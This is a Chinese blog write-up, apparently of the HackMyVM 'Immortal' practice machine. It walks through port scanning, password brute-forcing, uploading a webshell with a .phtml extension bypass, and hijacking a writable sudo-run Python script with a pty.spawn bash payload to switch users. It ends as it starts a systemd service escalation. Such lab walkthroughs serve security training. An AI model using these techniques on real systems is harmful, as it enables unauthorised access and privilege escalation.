Immortal - hackmyvm

最新推荐文章于 2024-07-19 17:18:30 发布

古明地核

最新推荐文章于 2024-07-19 17:18:30 发布

阅读量363

点赞数 5

分类专栏： hackmyvm靶场合集文章标签：安全服务器 linux 网络网络安全

本文链接：https://blog.csdn.net/tanbinn/article/details/137660235

版权

hackmyvm靶场合集专栏收录该内容

26 篇文章 0 订阅

订阅专栏

简介

靶场名：Immortal
难度：中等
靶场地址：https://hackmyvm.eu/machines/machine.php?vm=Immortal

本地环境

虚拟机：vitual box

靶场IP（Immortal）：192.168.56.106

跳板机IP(windows 10)：192.168.56.1 192.168.190.100

渗透机IP(ubuntu 22.04)：192.168.190.30

扫描

zenmap还真是可靠度随机呢……

nmap -p 1-65535 -T4 -A -v 192.168.56.106/32

http

朴素

BP爆破一下，得到密码为santiago

翻阅一下文件，先找到important.txt中的莫斯电码

解密出来内容为NOTHIN7MPORTANT。不论有没有用，先存着。

还有一些message.txt文件，这边汇总一下

I am very happy that you have included me in the project 
for the quest for immortality. I am sure we will succeed, whatever it takes. 
Best regards, Drake


Message to Eric.
Remember to buy mice for the experiments, there are very few left. Also remember to tell Boyras to give us the money he owes us, or else we'll have to beat it out of him ourselves.
Regards, David.

Message to all.
I'm glad you made it, I knew you would guess the password, it's the one we always used, although Boyras recommended us to stop using it because "it was in rockyou". 
By the way guys, you can still upload messages to the server from this new path -> upload_an_incredible_message.php
Saying goodbye very happy, David

获得一个关键信息——文件上传路径为/upload_an_incredible_message.php

文件上传漏洞

先随便传个php马上去

看来是有点基础检测的，把文件后缀改成phtml成功上传

然后就是随便弹shell了

（话说头一次见到webshell就能拿flag的情况……）

提权

话说这也能算提权吗……

总之先看到drake的目录下面有个...的目录

www-data@Immortal:/home/drake/...$ cat pass.txt
cat pass.txt
netflix : drake123
amazon : 123drake
shelldred : shell123dred (f4ns0nly)
system : kevcjnsgii
bank : myfavouritebank
nintendo : 123456

几个密码都试一下，到system的时候连进去了

sudo -l起手，看到有个权限

Matching Defaults entries for drake on Immortal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User drake may run the following commands on Immortal:
    (eric) NOPASSWD: /usr/bin/python3 /opt/immortal.py

这边的immortal.py对我们其实是有写权限的……所以也不用管了，直接写shell即可

drake@Immortal:/opt$ vi immortal.py
drake@Immortal:/opt$ cat immortal.py
import pty;pty.spawn("/bin/bash")
drake@Immortal:/opt$ sudo -u eric /usr/bin/python3 /opt/immortal.py
eric@Immortal:/opt$ id
uid=1002(eric) gid=1002(eric) groups=1002(eric)
eric@Immortal:/opt$

提权成功

service提权

sudo -l起手

eric@Immortal:~$ sudo -l
Matching Defaults entries for eric on Immortal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User eric may run the following commands on Immortal:
    (root) NOPASSWD: sudoedit /etc/systemd/system/immortal.service
    (root) NOPASSWD: /usr/bin/systemctl start immortal.service
    (root) NOPASSWD: /usr/bin/systemctl stop immortal.service
    (root) NOPASSWD: /usr/bin/systemctl enable immortal.service
    (root) NOPASSWD: /usr/bin/systemctl disable immortal.service
    (root) NOPASSWD: /usr/bin/systemctl daemon-reload

执行sudoedit看了一下，发现可以更改service的内容